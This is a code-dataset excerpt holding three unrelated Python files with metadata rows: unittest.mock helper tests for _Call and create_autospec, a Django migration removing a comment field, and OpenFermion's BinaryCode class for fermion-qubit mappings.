self.assertEqual(kall, _Call(({},)))
self.assertEqual(kall, _Call(('', ())))
self.assertEqual(kall, _Call(('', {})))
self.assertEqual(kall, _Call(('', (), {})))
self.assertEqual(kall, _Call(('foo',)))
self.assertEqual(kall, _Call(('bar', ())))
self.assertEqual(kall, _Call(('baz', {})))
self.assertEqual(kall, _Call(('spam', (), {})))
kall = _Call(((1, 2, 3),))
self.assertEqual(kall, _Call(((1, 2, 3),)))
self.assertEqual(kall, _Call(('', (1, 2, 3))))
self.assertEqual(kall, _Call(((1, 2, 3), {})))
self.assertEqual(kall, _Call(('', (1, 2, 3), {})))
kall = _Call(((1, 2, 4),))
self.assertNotEqual(kall, _Call(('', (1, 2, 3))))
self.assertNotEqual(kall, _Call(('', (1, 2, 3), {})))
kall = _Call(('foo', (1, 2, 4),))
self.assertNotEqual(kall, _Call(('', (1, 2, 4))))
self.assertNotEqual(kall, _Call(('', (1, 2, 4), {})))
self.assertNotEqual(kall, _Call(('bar', (1, 2, 4))))
self.assertNotEqual(kall, _Call(('bar', (1, 2, 4), {})))
kall = _Call(({'a': 3},))
self.assertEqual(kall, _Call(('', (), {'a': 3})))
self.assertEqual(kall, _Call(('', {'a': 3})))
self.assertEqual(kall, _Call(((), {'a': 3})))
self.assertEqual(kall, _Call(({'a': 3},)))
def test_empty__Call(self):
args = _Call()
self.assertEqual(args, ())
self.assertEqual(args, ('foo',))
self.assertEqual(args, ((),))
self.assertEqual(args, ('foo', ()))
self.assertEqual(args, ('foo',(), {}))
self.assertEqual(args, ('foo', {}))
self.assertEqual(args, ({},))
def test_named_empty_call(self):
args = _Call(('foo', (), {}))
self.assertEqual(args, ('foo',))
self.assertEqual(args, ('foo', ()))
self.assertEqual(args, ('foo',(), {}))
self.assertEqual(args, ('foo', {}))
self.assertNotEqual(args, ((),))
self.assertNotEqual(args, ())
self.assertNotEqual(args, ({},))
self.assertNotEqual(args, ('bar',))
self.assertNotEqual(args, ('bar', ()))
self.assertNotEqual(args, ('bar', {}))
def test_call_with_args(self):
args = _Call(((1, 2, 3), {}))
self.assertEqual(args, ((1, 2, 3),))
self.assertEqual(args, ('foo', (1, 2, 3)))
self.assertEqual(args, ('foo', (1, 2, 3), {}))
self.assertEqual(args, ((1, 2, 3), {}))
def test_named_call_with_args(self):
args = _Call(('foo', (1, 2, 3), {}))
self.assertEqual(args, ('foo', (1, 2, 3)))
self.assertEqual(args, ('foo', (1, 2, 3), {}))
self.assertNotEqual(args, ((1, 2, 3),))
self.assertNotEqual(args, ((1, 2, 3), {}))
def test_call_with_kwargs(self):
args = _Call(((), dict(a=3, b=4)))
self.assertEqual(args, (dict(a=3, b=4),))
self.assertEqual(args, ('foo', dict(a=3, b=4)))
self.assertEqual(args, ('foo', (), dict(a=3, b=4)))
self.assertEqual(args, ((), dict(a=3, b=4)))
def test_named_call_with_kwargs(self):
args = _Call(('foo', (), dict(a=3, b=4)))
self.assertEqual(args, ('foo', dict(a=3, b=4)))
self.assertEqual(args, ('foo', (), dict(a=3, b=4)))
self.assertNotEqual(args, (dict(a=3, b=4),))
self.assertNotEqual(args, ((), dict(a=3, b=4)))
def test_call_with_args_call_empty_name(self):
args = _Call(((1, 2, 3), {}))
self.assertEqual(args, call(1, 2, 3))
self.assertEqual(call(1, 2, 3), args)
self.assertIn(call(1, 2, 3), [args])
def test_call_ne(self):
self.assertNotEqual(_Call(((1, 2, 3),)), call(1, 2))
self.assertFalse(_Call(((1, 2, 3),)) != call(1, 2, 3))
self.assertTrue(_Call(((1, 2), {})) != call(1, 2, 3))
def test_call_non_tuples(self):
kall = _Call(((1, 2, 3),))
for value in 1, None, self, int:
self.assertNotEqual(kall, value)
self.assertFalse(kall == value)
def test_repr(self):
self.assertEqual(repr(_Call()), 'call()')
self.assertEqual(repr(_Call(('foo',))), 'call.foo()')
self.assertEqual(repr(_Call(((1, 2, 3), {'a': 'b'}))),
"call(1, 2, 3, a='b')")
self.assertEqual(repr(_Call(('bar', (1, 2, 3), {'a': 'b'}))),
"call.bar(1, 2, 3, a='b')")
self.assertEqual(repr(call), 'call')
self.assertEqual(str(call), 'call')
self.assertEqual(repr(call()), 'call()')
self.assertEqual(repr(call(1)), 'call(1)')
self.assertEqual(repr(call(zz='thing')), "call(zz='thing')")
self.assertEqual(repr(call().foo), 'call().foo')
self.assertEqual(repr(call(1).foo.bar(a=3).bing),
'call().foo.bar().bing')
self.assertEqual(
repr(call().foo(1, 2, a=3)),
"call().foo(1, 2, a=3)"
)
self.assertEqual(repr(call()()), "call()()")
self.assertEqual(repr(call(1)(2)), "call()(2)")
self.assertEqual(
repr(call()().bar().baz.beep(1)),
"call()().bar().baz.beep(1)"
)
def test_call(self):
self.assertEqual(call(), ('', (), {}))
self.assertEqual(call('foo', 'bar', one=3, two=4),
('', ('foo', 'bar'), {'one': 3, 'two': 4}))
mock = Mock()
mock(1, 2, 3)
mock(a=3, b=6)
self.assertEqual(mock.call_args_list,
[call(1, 2, 3), call(a=3, b=6)])
def test_attribute_call(self):
self.assertEqual(call.foo(1), ('foo', (1,), {}))
self.assertEqual(call.bar.baz(fish='eggs'),
('bar.baz', (), {'fish': 'eggs'}))
mock = Mock()
mock.foo(1, 2 ,3)
mock.bar.baz(a=3, b=6)
self.assertEqual(mock.method_calls,
[call.foo(1, 2, 3), call.bar.baz(a=3, b=6)])
def test_extended_call(self):
result = call(1).foo(2).bar(3, a=4)
self.assertEqual(result, ('().foo().bar', (3,), dict(a=4)))
mock = MagicMock()
mock(1, 2, a=3, b=4)
self.assertEqual(mock.call_args, call(1, 2, a=3, b=4))
self.assertNotEqual(mock.call_args, call(1, 2, 3))
self.assertEqual(mock.call_args_list, [call(1, 2, a=3, b=4)])
self.assertEqual(mock.mock_calls, [call(1, 2, a=3, b=4)])
mock = MagicMock()
mock.foo(1).bar()().baz.beep(a=6)
last_call = call.foo(1).bar()().baz.beep(a=6)
self.assertEqual(mock.mock_calls[-1], last_call)
self.assertEqual(mock.mock_calls, last_call.call_list())
def test_call_list(self):
mock = MagicMock()
mock(1)
self.assertEqual(call(1).call_list(), mock.mock_calls)
mock = MagicMock()
mock(1).method(2)
self.assertEqual(call(1).method(2).call_list(),
mock.mock_calls)
mock = MagicMock()
mock(1).method(2)(3)
self.assertEqual(call(1).method(2)(3).call_list(),
mock.mock_calls)
mock = MagicMock()
int(mock(1).method(2)(3).foo.bar.baz(4)(5))
kall = call(1).method(2)(3).foo.bar.baz(4)(5).__int__()
self.assertEqual(kall.call_list(), mock.mock_calls)
def test_call_any(self):
self.assertEqual(call, ANY)
m = MagicMock()
int(m)
self.assertEqual(m.mock_calls, [ANY])
self.assertEqual([ANY], m.mock_calls)
def test_two_args_call(self):
args = _Call(((1, 2), {'a': 3}), two=True)
self.assertEqual(len(args), 2)
self.assertEqual(args[0], (1, 2))
self.assertEqual(args[1], {'a': 3})
other_args = _Call(((1, 2), {'a': 3}))
self.assertEqual(args, other_args)
def test_call_with_name(self):
self.assertEqual(_Call((), 'foo')[0], 'foo')
self.assertEqual(_Call((('bar', 'barz'),),)[0], '')
self.assertEqual(_Call((('bar', 'barz'), {'hello': 'world'}),)[0], '')
class SpecSignatureTest(unittest.TestCase):
def _check_someclass_mock(self, mock):
self.assertRaises(AttributeError, getattr, mock, 'foo')
mock.one(1, 2)
mock.one.assert_called_with(1, 2)
self.assertRaises(AssertionError,
mock.one.assert_called_with, 3, 4)
self.assertRaises(TypeError, mock.one, 1)
mock.two()
mock.two.assert_called_with()
self.assertRaises(AssertionError,
mock.two.assert_called_with, 3)
self.assertRaises(TypeError, mock.two, 1)
mock.three()
mock.three.assert_called_with()
self.assertRaises(AssertionError,
mock.three.assert_called_with, 3)
self.assertRaises(TypeError, mock.three, 3, 2)
mock.three(1)
mock.three.assert_called_with(1)
mock.three(a=1)
mock.three.assert_called_with(a=1)
def test_basic(self):
mock = create_autospec(SomeClass)
self._check_someclass_mock(mock)
mock = create_autospec(SomeClass())
self._check_someclass_mock(mock)
def test_create_autospec_return_value(self):
def f():
pass
mock = create_autospec(f, return_value='foo')
self.assertEqual(mock(), 'foo')
class Foo(object):
pass
mock = create_autospec(Foo, return_value='foo')
self.assertEqual(mock(), 'foo')
def test_autospec_reset_mock(self):
m = create_autospec(int)
int(m)
m.reset_mock()
self.assertEqual(m.__int__.call_count, 0)
def test_mocking_unbound_methods(self):
class Foo(object):
def foo(self, foo):
pass
p = patch.object(Foo, 'foo')
mock_foo = p.start()
Foo().foo(1)
mock_foo.assert_called_with(1)
def test_create_autospec_unbound_methods(self):
# see mock issue 128
# this is expected to fail until the issue is fixed
return
class Foo(object):
def foo(self):
pass
klass = create_autospec(Foo)
instance = klass()
self.assertRaises(TypeError, instance.foo, 1)
# Note: no type checking on the "self" parameter
klass.foo(1)
klass.foo.assert_called_with(1)
self.assertRaises(TypeError, klass.foo)
def test_create_autospec_keyword_arguments(self):
class Foo(object):
a = 3
m = create_autospec(Foo, a='3')
self.assertEqual(m.a, '3')
def test_create_autospec_keyword_only_arguments(self):
def foo(a, *, b=None):
pass
m = create_autospec(foo)
m(1)
m.assert_called_with(1)
self.assertRaises(TypeError, m, 1, 2)
m(2, b=3)
m.assert_called_with(2, b=3)
def test_function_as_instance_attribute(self):
obj = SomeClass()
def f(a):
pass
obj.f = f
mock = create_autospec(obj)
mock.f('bing')
mock.f.assert_called_with('bing')
def test_spec_as_list(self):
# because spec as a list of strings in the mock constructor means
# something very different we treat a list instance as the type.
mock = create_autospec([])
mock.append('foo')
mock.append.assert_called_with('foo')
self.assertRaises(AttributeError, getattr, mock, 'foo')
class Foo(object):
foo = []
mock = create_autospec(Foo)
mock.foo.append(3)
mock.foo.append.assert_called_with(3)
self.assertRaises(AttributeError, getattr, mock.foo, 'foo')
def test_attributes(self):
class Sub(SomeClass):
attr = SomeClass()
sub_mock = create_autospec(Sub)
for mock in (sub_mock, sub_mock.attr):
self._check_someclass_mock(mock)
def test_builtin_functions_types(self):
# we could replace builtin functions / methods with a function
# with *args / **kwargs signature. Using the builtin method type
# as a spec seems to work fairly well though.
class BuiltinSubclass(list):
def bar(self, arg):
pass
sorted = sorted
attr = {}
mock = create_autospec(BuiltinSubclass)
mock.append(3)
mock.append.assert_called_with(3)
self.assertRaises(AttributeError, getattr, mock.append, 'foo')
mock.bar('foo')
mock.bar.assert_called_with('foo')
self.assertRaises(TypeError, mock.bar, 'foo', 'bar')
self.assertRaises(AttributeError, getattr, mock.bar, 'foo')
mock.sorted([1, 2])
mock.sorted.assert_called_with([1, 2])
self.assertRaises(AttributeError, getattr, mock.sorted, 'foo')
mock.attr.pop(3)
mock.attr.pop.assert_called_with(3)
self.assertRaises(AttributeError, getattr, mock.attr, 'foo')
def test_method_calls(self):
class Sub(SomeClass):
attr = SomeClass()
mock = create_autospec(Sub)
mock.one(1, 2)
mock.two()
mock.three(3)
expected = [call.one(1, 2), call.two(), call.three(3)]
self.assertEqual(mock.method_calls, expected)
mock.attr.one(1, 2)
mock.attr.two()
mock.attr.three(3)
expected.extend(
[call.attr.one(1, 2), call.attr.two(), call.attr.three(3)]
)
self.assertEqual(mock.method_calls, expected)
def test_magic_methods(self):
class BuiltinSubclass(list):
attr = {}
mock = create_autospec(BuiltinSubclass)
self.assertEqual(list(mock), [])
self.assertRaises(TypeError, int, mock)
self.assertRaises(TypeError, int, mock.attr)
self.assertEqual(list(mock), [])
self.assertIsInstance(mock['foo'], MagicMock)
self.assertIsInstance(mock.attr['foo'], MagicMock)
def test_spec_set(self):
class Sub(SomeClass):
attr = SomeClass()
for spec in (Sub, Sub()):
mock = create_autospec(spec, spec_set=True)
self._check_someclass_mock(mock)
self.assertRaises(AttributeError, setattr, mock, 'foo', 'bar')
self.assertRaises(AttributeError, setattr, mock.attr, 'foo', 'bar')
def test_descriptors(self):
class Foo(object):
@classmethod
def f(cls, a, b):
pass
@staticmethod
def g(a, b):
pass
class Bar(Foo):
pass
class Baz(SomeClass, Bar):
pass
for spec in (Foo, Foo(), Bar, Bar(), Baz, Baz()):
mock = create_autospec(spec)
mock.f(1, 2)
mock.f.assert_called_once_with(1, 2)
mock.g(3, 4)
mock.g.assert_called_once_with(3, 4)
def test_recursive(self):
class A(object):
def a(self):
pass
foo = 'foo bar baz'
bar = foo
A.B = A
mock = create_autospec(A)
mock()
self.assertFalse(mock.B.called)
mock.a()
mock.B.a()
self.assertEqual(mock.method_calls, [call.a(), call.B.a()])
self.assertIs(A.foo, A.bar)
self.assertIsNot(mock.foo, mock.bar)
mock.foo.lower()
self.assertRaises(AssertionError, mock.bar.lower.assert_called_with)
def test_spec_inheritance_for_classes(self):
class Foo(object):
def a(self, x):
pass
class Bar(object):
def f(self, y):
pass
class_mock = create_autospec(Foo)
self.assertIsNot(class_mock, class_mock())
for this_mock in class_mock, class_mock():
this_mock.a(x=5)
this_mock.a.assert_called_with(x=5)
this_mock.a.assert_called_with(5)
self.assertRaises(TypeError, this_mock.a, 'foo', 'bar')
self.assertRaises(AttributeError, getattr, this_mock, 'b')
instance_mock = create_autospec(Foo())
instance_mock.a(5)
instance_mock.a.assert_called_with(5)
instance_mock.a.assert_called_with(x=5)
self.assertRaises(TypeError, instance_mock.a, 'foo', 'bar')
self.assertRaises(AttributeError, getattr, instance_mock, 'b')
# The return value isn't isn't callable
self.assertRaises(TypeError, instance_mock)
instance_mock.Bar.f(6)
instance_mock.Bar.f.assert_called_with(6)
instance_mock.Bar.f.assert_called_with(y=6)
self.assertRaises(AttributeError, getattr, instance_mock.Bar, 'g')
instance_mock.Bar().f(6)
instance_mock.Bar().f.assert_called_with(6)
instance_mock.Bar().f.assert_called_with(y=6)
self.assertRaises(AttributeError, getattr, instance_mock.Bar(), 'g')
def test_inherit(self):
class Foo(object):
a = 3
Foo.Foo = Foo
# class
mock = create_autospec(Foo)
instance = mock()
self.assertRaises(AttributeError, getattr, instance, 'b')
attr_instance = mock.Foo()
self.assertRaises(AttributeError, getattr, attr_instance, 'b')
# instance
mock = create_autospec(Foo())
self.assertRaises(AttributeError, getattr, mock, 'b')
self.assertRaises(TypeError, mock)
# attribute instance
call_result = mock.Foo()
self.assertRaises(AttributeError, getattr, call_result, 'b')
def test_builtins(self):
# used to fail with infinite recursion
create_autospec(1)
create_autospec(int)
create_autospec('foo')
create_autospec(str)
create_autospec({})
create_autospec(dict)
create_autospec([])
create_autospec(list)
create_autospec(set())
create_autospec(set)
create_autospec(1.0)
create_autospec(float)
create_autospec(1j)
create_autospec(complex)
create_autospec(False)
create_autospec(True)
def test_function(self):
def f(a, b):
pass
mock = create_autospec(f)
self.assertRaises(TypeError, mock)
mock(1, 2)
mock.assert_called_with(1, 2)
mock.assert_called_with(1, b=2)
mock.assert_called_with(a=1, b=2)
f.f = f
mock = create_autospec(f)
self.assertRaises(TypeError, mock.f)
mock.f(3, 4)
mock.f.assert_called_with(3, 4)
mock.f.assert_called_with(a=3, b=4)
def test_skip_attributeerrors(self):
class Raiser(object):
def __get__(self, obj, type=None):
if obj is None:
raise AttributeError('Can only be accessed via an instance')
class RaiserClass(object):
raiser = Raiser()
@staticmethod
def existing(a, b):
return a + b
s = create_autospec(RaiserClass)
self.assertRaises(TypeError, lambda x: s.existing(1, 2, 3))
s.existing(1, 2)
self.assertRaises(AttributeError, lambda: s.nonexisting)
# check we can fetch the raiser attribute and it has no spec
obj = s.raiser
obj.foo, obj.bar
def test_signature_class(self):
class Foo(object):
def __init__(self, a, b=3):
pass
mock = create_autospec(Foo)
self.assertRaises(TypeError, mock)
mock(1)
mock.assert_called_once_with(1)
mock.assert_called_once_with(a=1)
self.assertRaises(AssertionError, mock.assert_called_once_with, 2)
mock(4, 5)
mock.assert_called_with(4, 5)
mock.assert_called_with(a=4, b=5)
self.assertRaises(AssertionError, mock.assert_called_with, a=5, b=4)
def test_class_with_no_init(self):
# this used to raise an exception
# due to trying to get a signature from object.__init__
class Foo(object):
pass
create_autospec(Foo)
def test_signature_callable(self):
class Callable(object):
def __init__(self, x, y):
pass
def __call__(self, a):
pass
mock = create_autospec(Callable)
mock(1, 2)
mock.assert_called_once_with(1, 2)
mock.assert_called_once_with(x=1, y=2)
self.assertRaises(TypeError, mock, 'a')
instance = mock(1, 2)
self.assertRaises(TypeError, instance)
instance(a='a')
instance.assert_called_once_with('a')
instance.assert_called_once_with(a='a')
instance('a')
instance.assert_called_with('a')
instance.assert_called_with(a='a')
mock = create_autospec(Callable(1, 2))
mock(a='a')
mock.assert_called_once_with(a='a')
self.assertRaises(TypeError, mock)
mock('a')
mock.assert_called_with('a')
def test_signature_noncallable(self):
class NonCallable(object):
def __init__(self):
pass
mock = create_autospec(NonCallable)
instance = mock()
mock.assert_called_once_with()
self.assertRaises(TypeError, mock, 'a')
self.assertRaises(TypeError, instance)
self.assertRaises(TypeError, instance, 'a')
mock = create_autospec(NonCallable())
self.assertRaises(TypeError, mock)
self.assertRaises(TypeError, mock, 'a')
def test_create_autospec_none(self):
class Foo(object):
bar = None
mock = create_autospec(Foo)
none = mock.bar
self.assertNotIsInstance(none, type(None))
none.foo()
none.foo.assert_called_once_with()
def test_autospec_functions_with_self_in_odd_place(self):
class Foo(object):
def f(a, self):
pass
a = create_autospec(Foo)
a.f(10)
a.f.assert_called_with(10)
a.f.assert_called_with(self=10)
a.f(self=10)
a.f.assert_called_with(10)
a.f.assert_called_with(self=10)
def test_autospec_data_descriptor(self):
class Descriptor(object):
def __init__(self, value):
self.value = value
def __get__(self, obj, cls=None):
if obj is None:
return self
return self.value
def __set__(self, obj, value):
pass
class MyProperty(property):
pass
class Foo(object):
__slots__ = ['slot']
@property
def prop(self):
return 3
@MyProperty
def subprop(self):
return 4
desc = Descriptor(42)
foo = create_autospec(Foo)
def check_data_descriptor(mock_attr):
# Data descriptors don't have a spec.
self.assertIsInstance(mock_attr, MagicMock)
mock_attr(1, 2, 3)
mock_attr.abc(4, 5, 6)
mock_attr.assert_called_once_with(1, 2, 3)
mock_attr.abc.assert_called_once_with(4, 5, 6)
# property
check_data_descriptor(foo.prop)
# property subclass
check_data_descriptor(foo.subprop)
# class __slot__
check_data_descriptor(foo.slot)
# plain data descriptor
check_data_descriptor(foo.desc)
def test_autospec_on_bound_builtin_function(self):
meth = types.MethodType(time.ctime, time.time())
self.assertIsInstance(meth(), str)
mocked = create_autospec(meth)
# no signature, so no spec to check against
mocked()
mocked.assert_called_once_with()
mocked.reset_mock()
mocked(4, 5, 6)
mocked.assert_called_once_with(4, 5, 6)
class TestCallList(unittest.TestCase):
def test_args_list_contains_call_list(self):
mock = Mock()
self.assertIsInstance(mock.call_args_list, _CallList)
mock(1, 2)
mock(a=3)
mock(3, 4)
mock(b=6)
for kall in call(1, 2), call(a=3), call(3, 4), call(b=6):
self.assertIn(kall, mock.call_args_list)
calls = [call(a=3), call(3, 4)]
self.assertIn(calls, mock.call_args_list)
calls = [call(1, 2), call(a=3)]
self.assertIn(calls, mock.call_args_list)
calls = [call(3, 4), call(b=6)]
self.assertIn(calls, mock.call_args_list)
calls = [call(3, 4)]
self.assertIn(calls, mock.call_args_list)
self.assertNotIn(call('fish'), mock.call_args_list)
self.assertNotIn([call('fish')], mock.call_args_list)
def test_call_list_str(self):
mock = Mock()
mock(1, 2)
mock.foo(a=3)
mock.foo.bar().baz('fish', cat='dog')
expected = (
"[call(1, 2),\n"
" call.foo(a=3),\n"
" call.foo.bar(),\n"
" call.foo.bar().baz('fish', cat='dog')]"
)
self.assertEqual(str(mock.mock_calls), expected)
def test_propertymock(self):
p = patch('%s.SomeClass.one' % __name__, new_callable=PropertyMock)
mock = p.start()
try:
SomeClass.one
mock.assert_called_once_with()
s = SomeClass()
s.one
mock.assert_called_with()
self.assertEqual(mock.mock_calls, [call(), call()])
s.one = 3
self.assertEqual(mock.mock_calls, [call(), call(), call(3)])
finally:
p.stop()
def test_propertymock_returnvalue(self):
m = MagicMock()
p = PropertyMock()
type(m).foo = p
returned = m.foo
p.assert_called_once_with()
self.assertIsInstance(returned, MagicMock)
self.assertNotIsInstance(returned, PropertyMock)
if __name__ == '__main__':
unittest.main()
| Mark_attandance_py_selenium/py/App/Python/Lib/unittest/test/testmock/testhelpers.py | 27,816 | see mock issue 128 this is expected to fail until the issue is fixed Note: no type checking on the "self" parameter because spec as a list of strings in the mock constructor means something very different we treat a list instance as the type. we could replace builtin functions / methods with a function with *args / **kwargs signature. Using the builtin method type as a spec seems to work fairly well though. The return value isn't isn't callable class instance attribute instance used to fail with infinite recursion check we can fetch the raiser attribute and it has no spec this used to raise an exception due to trying to get a signature from object.__init__ Data descriptors don't have a spec. property property subclass class __slot__ plain data descriptor no signature, so no spec to check against | 806 | en | 0.905684 |
# Generated by Django 3.2.4 on 2021-08-06 15:38
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('blog', '0002_alter_tag_tag_name'),
]
operations = [
migrations.RemoveField(
model_name='comment',
name='subject',
),
]
| blog/migrations/0003_remove_comment_subject.py | 327 | Generated by Django 3.2.4 on 2021-08-06 15:38 | 45 | en | 0.758967 |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Binary code class for Fermion-qubit mappings (arXiv:1712.07067) """
import copy
import numpy
import scipy
import scipy.sparse
from openfermion.ops import BinaryPolynomial
def shift_decoder(decoder, shift_constant):
""" Shifts the indices of a decoder by a constant.
Args:
decoder (iterable): list of BinaryPolynomial; the decoder
shift_constant (int): the qubit index that corresponds to the offset.
Returns (list): list of BinaryPolynomial shifted decoder
"""
decode_shifted = []
if not isinstance(shift_constant, (numpy.int64, numpy.int32, int)):
raise TypeError('the shift to the decoder must be integer. got {}'
'of type {}'.format(shift_constant,
type(shift_constant)))
for entry in decoder:
tmp_entry = copy.deepcopy(entry)
tmp_entry.shift(shift_constant)
decode_shifted.append(tmp_entry)
return decode_shifted
def double_decoding(decoder_1, decoder_2):
""" Concatenates two decodings
Args:
decoder_1 (iterable): list of BinaryPolynomial
decoding of the outer code layer
decoder_2 (iterable): list of BinaryPolynomial
decoding of the inner code layer
Returns (list): list of BinaryPolynomial the decoding defined by
w -> decoder_1( decoder_2(w) )
"""
doubled_decoder = []
for entry in decoder_1:
tmp_sum = 0
for summand in entry.terms:
tmp_term = BinaryPolynomial('1')
for factor in summand:
if isinstance(factor, (numpy.int32, numpy.int64, int)):
tmp_term *= decoder_2[factor]
tmp_sum = tmp_term + tmp_sum
doubled_decoder += [tmp_sum]
return doubled_decoder
class BinaryCodeError(Exception):
pass
class BinaryCode(object):
"""The BinaryCode class provides a representation of an encoding-decoding
pair for binary vectors of different lengths, where the decoding is allowed
to be non-linear.
As the occupation number of fermionic mode is effectively binary,
a length-N vector (v) of binary number can be utilized to describe
a configuration of a many-body fermionic state on N modes.
An n-qubit product state configuration \|w0> \|w1> \|w2> ... \|wn-1>,
on the other hand is described by a length-n binary vector
w=(w0, w1, ..., wn-1). To map a subset of N-Orbital Fermion states
to n-qubit states we define a binary code, which consists of a
(here: linear) encoding (e) and a (non-linear) decoding (d), such
that for every v from that subset, w = e(v) is a length-n binary
vector with d(w) = v. This can be used to save qubits given a
Hamiltonian that dictates such a subset, otherwise n=N.
Two binary codes (e,d) and (e',d') can construct a third code (e",d")
by two possible operations:
Concatenation: (e",d") = (e,d) * (e',d')
which means e": v" -> e'( e(v") ) and d": w" -> d( d'(w") )
where n" = n' and N" = N, with n = N' as necessary condition.
Appendage: (e",d") = (e,d) + (e',d')
which means e": (v + v') -> e(v) + e'(v') and d": (w + w') -> d(w) + d'(
w')
where the addition is to be understood as appending two vectors together,
so N" = N' + N and n" = n + n'.
Appending codes is particularly useful when considering segment codes or
segmented transforms.
A BinaryCode-instance is initialized by BinaryCode(A,d),
given the encoding (e) as n x N array or matrix-like nested lists A,
such that e(v) = (A v) mod 2. The decoding d is an array or a list
input of length N, which has entries either of type BinaryPolynomial, or of
valid type for an input of the BinaryPolynomial-constructor.
The signs + and \*, += and \*= are overloaded to implement concatenation
and appendage on BinaryCode-objects.
NOTE: multiplication of a BinaryCode with an integer yields a
multiple appending of the same code, the multiplication with another
BinaryCode their concatenation.
Attributes:
decoder (list): list of BinaryPolynomial: Outputs the decoding
functions as components.
encoder (scipy.sparse.csc_matrix): Outputs A, the linear matrix that
implements the encoding function.
n_modes (int): Outputs the number of modes.
n_qubits (int): Outputs the number of qubits.
"""
def __init__(self, encoding, decoding):
""" Initialization of a binary code.
Args:
encoding (np.ndarray or list): nested lists or binary 2D-array
decoding (array or list): list of BinaryPolynomial (list or str).
Raises:
TypeError: non-list, array like encoding or decoding, unsuitable
BinaryPolynomial generators,
BinaryCodeError: in case of decoder/encoder size mismatch or
decoder size, qubits indexed mismatch
"""
if not isinstance(encoding, (numpy.ndarray, list)):
raise TypeError('encoding must be a list or array.')
if not isinstance(decoding, (numpy.ndarray, list)):
raise TypeError('decoding must be a list or array.')
self.encoder = scipy.sparse.csc_matrix(encoding)
self.n_qubits, self.n_modes = numpy.shape(encoding)
if self.n_modes != len(decoding):
raise BinaryCodeError(
'size mismatch, decoder and encoder should have the same'
' first dimension')
decoder_qubits = set()
self.decoder = []
for symbolic_binary in decoding:
if isinstance(symbolic_binary, (tuple, list, str, int,
numpy.int32, numpy.int64)):
symbolic_binary = BinaryPolynomial(symbolic_binary)
if isinstance(symbolic_binary, BinaryPolynomial):
self.decoder.append(symbolic_binary)
decoder_qubits = decoder_qubits | set(
symbolic_binary.enumerate_qubits())
else:
raise TypeError(
'decoder component provided '
'is not a suitable for BinaryPolynomial',
symbolic_binary)
if len(decoder_qubits) != self.n_qubits:
raise BinaryCodeError(
'decoder and encoder provided has different number of qubits')
if max(decoder_qubits) + 1 > self.n_qubits:
raise BinaryCodeError('decoder is not indexing some qubits. Qubits'
'indexed are: {}'.format(decoder_qubits))
def __iadd__(self, appendix):
""" In-place appending a binary code with +=.
Args:
appendix (BinaryCode): The code to append to the present one.
Returns (BinaryCode): A global binary code with size
(n_modes1 + n_modes2), (n_qubits1,n_qubits2)
Raises:
TypeError: Appendix must be a BinaryCode.
"""
if not isinstance(appendix, BinaryCode):
raise TypeError('argument must be a BinaryCode.')
self.decoder = numpy.append(self.decoder,
shift_decoder(appendix.decoder,
self.n_qubits)).tolist()
self.encoder = scipy.sparse.bmat([[self.encoder, None],
[None, appendix.encoder]])
self.n_qubits, self.n_modes = numpy.shape(self.encoder)
return self
def __add__(self, appendix):
"""Appends two binary codes via addition +.
Args:
appendix (BinaryCode): The code to append to the present one.
Returns (BinaryCode): global binary code
"""
twin = copy.deepcopy(self)
twin += appendix
return twin
def __imul__(self, factor):
"""In-place code concatenation or appendage via *= .
Multiplication with integer will yield appendage, otherwise
concatenation.
Args:
factor (int or BinaryCode): the BinaryCode to concatenate. In case
of int, it will append the code to itself factor times.
Returns (BinaryCode): segmented or concatenated code
Raises:
TypeError: factor must be an integer or a BinaryCode
BinaryCodeError: size mismatch between self and factor
ValueError: in case of an integer factor that is < 1
"""
if not isinstance(factor, (BinaryCode, numpy.int32, numpy.int64, int)):
raise TypeError('argument must be a BinaryCode or integer')
if isinstance(factor, BinaryCode):
if self.n_qubits != factor.n_modes:
raise BinaryCodeError(
'size mismatch between inner and outer code layer')
self.decoder = double_decoding(self.decoder, factor.decoder)
self.encoder = factor.encoder.dot(self.encoder)
self.n_qubits, self.n_modes = numpy.shape(self.encoder)
return self
elif isinstance(factor, (numpy.int32, numpy.int64, int)):
if factor < 1:
raise ValueError('integer factor has to be positive, '
'non-zero ')
self.encoder = scipy.sparse.kron(
scipy.sparse.identity(factor, format='csc', dtype=int),
self.encoder, 'csc')
tmp_decoder = self.decoder
for index in numpy.arange(1, factor):
self.decoder = numpy.append(self.decoder,
shift_decoder(tmp_decoder,
index *
self.n_qubits))
self.n_qubits *= factor
self.n_modes *= factor
return self
def __mul__(self, factor):
""" Concatenation of two codes or appendage the same code factor times
in case of integer factor.
Args:
factor (int or BinaryCode): the BinaryCode to concatenate. In case
of int, it will append the code to itself factor times.
Returns (BinaryCode): segmented or concatenated code
"""
twin = copy.deepcopy(self)
twin *= factor
return twin
def __rmul__(self, factor):
""" Appending the same code factor times.
Args:
factor (int): integer defining number of appendages.
Returns (BinaryCode): Segmented code.
Raises:
TypeError: factor must be an integer
"""
if isinstance(factor, (numpy.int32, numpy.int64, int)):
return self * factor
else:
raise TypeError('the left multiplier must be an integer to a'
'BinaryCode. Was given {} of '
'type {}'.format(factor, type(factor)))
def __str__(self):
""" Return an easy-to-read string representation."""
string_return = [list(map(list, self.encoder.toarray()))]
dec_str = '['
for term in self.decoder:
dec_str += term.__str__() + ','
dec_str = dec_str[:-1]
string_return.append(dec_str + ']')
return str(string_return)
def __repr__(self):
return str(self)
| src/openfermion/ops/_binary_code.py | 11,940 | The BinaryCode class provides a representation of an encoding-decoding
pair for binary vectors of different lengths, where the decoding is allowed
to be non-linear.
As the occupation number of fermionic mode is effectively binary,
a length-N vector (v) of binary number can be utilized to describe
a configuration of a many-body fermionic state on N modes.
An n-qubit product state configuration \|w0> \|w1> \|w2> ... \|wn-1>,
on the other hand is described by a length-n binary vector
w=(w0, w1, ..., wn-1). To map a subset of N-Orbital Fermion states
to n-qubit states we define a binary code, which consists of a
(here: linear) encoding (e) and a (non-linear) decoding (d), such
that for every v from that subset, w = e(v) is a length-n binary
vector with d(w) = v. This can be used to save qubits given a
Hamiltonian that dictates such a subset, otherwise n=N.
Two binary codes (e,d) and (e',d') can construct a third code (e",d")
by two possible operations:
